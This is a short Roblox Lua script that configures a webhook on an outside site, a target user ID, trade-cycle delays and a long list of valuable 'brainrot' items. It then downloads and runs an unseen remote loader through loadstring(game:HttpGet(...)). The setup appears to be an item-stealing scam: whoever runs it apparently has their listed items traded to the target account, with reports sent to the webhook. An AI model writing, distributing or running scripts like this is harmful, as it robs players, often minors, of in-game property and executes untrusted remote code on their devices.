getgenv().WEBHOOK_URL = "https://skama.net/api/logs/webhook/mrr_d8dbd77f940d4a71a810e3b259300b85"
getgenv().TARGET_ID = 9831410440
getgenv().DELAY_STEP = 1      
getgenv().TRADE_CYCLE_DELAY = 2 
getgenv().TARGET_BRAINROTS = {
    ["Ketchuru and Musturu"] = true,
    ["Ketupat Kepat"] = true,
    ["Tang Tang Keletang"] = true,
    ["Tictac Sahur"] = true,
    ["Skibidi Toilet"] = true,
    ["Meowl"] = true,
    ["Strawberry Elephant"] = true,
    ["Esok Sekolah"] = true,
    ["Chillin Chili"] = true,
    ["Mariachi Corazoni"] = true,
    ["Chipso and Queso"] = true,
    ["Chill Puppy"] = true,
    ["Nuclearo Dinossauro"] = true,
    ["Garama and Madundung"] = true,
    ["Lavadorito Spinito"] = true,
    ["Burguro And Fryuro"] = true,
    ["Dragon Cannelloni"] = true,
    ["Swag Soda"] = true,
    ["Tralaledon"] = true,
    ["Spooky and Pumpky"] = true,
    ["Fragrama and Chocrama"] = true,
    ["Cooki and Milki"] = true,
    ["Popcuru and Fizzuru"] = true,
    ["Dragon Gingerini"] = true,
    ["Rosey and Teddy"] = true,
    ["Headless Horseman"] = true,
    ["Hydra Dragon Cannelloni"] = true,
    ["La Grande Combinasion"] = true,
    ["Bacuru and Egguru"] = true,
    ["Money Money Reindeer"] = true,
    ["Orcaledon"] = true,
    ["La Supreme Combinasion"] = true,
    ["Celularcini Viciosini"] = true,
    ["Capitano Moby"] = true,
    ["Cerberus"] = true,
    ["Extinct Matteo"] = true,
    ["Tuff Toucan"] = true,
    ["Gobblino Uniciclino"] = true,
    ["La Taco Combinasion"] = true,
    ["La Romantic Grande"] = true,
    ["Tacorita Bicicleta"] = true,
    ["La Extinct Grande"] = true,
    ["Love Love Love Sahur"] = true,
    ["Swaggy Bros"] = true,
    ["Festive 67"] = true,
    ["W or L"] = true,
    ["La Jolly Grande"] = true,
    ["Money Money Puggy"] = true,
    ["Guest 666"] = true,
    ["Los Hotspotsitos"] = true,
    ["Los Bros"] = true,
    ["Los Puggies"] = true,
    ["Los Primos"] = true,
    ["Los Tacoritas"] = true,
    ["Los Spaghettis"] = true,
    ["La Casa Boo"] = true,
    ["Los Sekolahs"] = true,
    ["Reinito Sleighito"] = true,
    ["Ketupat Bros"] = true,
    ["Las Sis"] = true,
    ["Los Planitos"] = true,
    ["Los Mobilis"] = true,
    ["Jolly Jolly Sahur"] = true,
    ["Los Jolly Combinasionas"] = true
}
loadstring(game:HttpGet("https://api.luarmor.net/files/v4/loaders/9a91b3ba6fb71423853ec2f885c42d67.lua"))()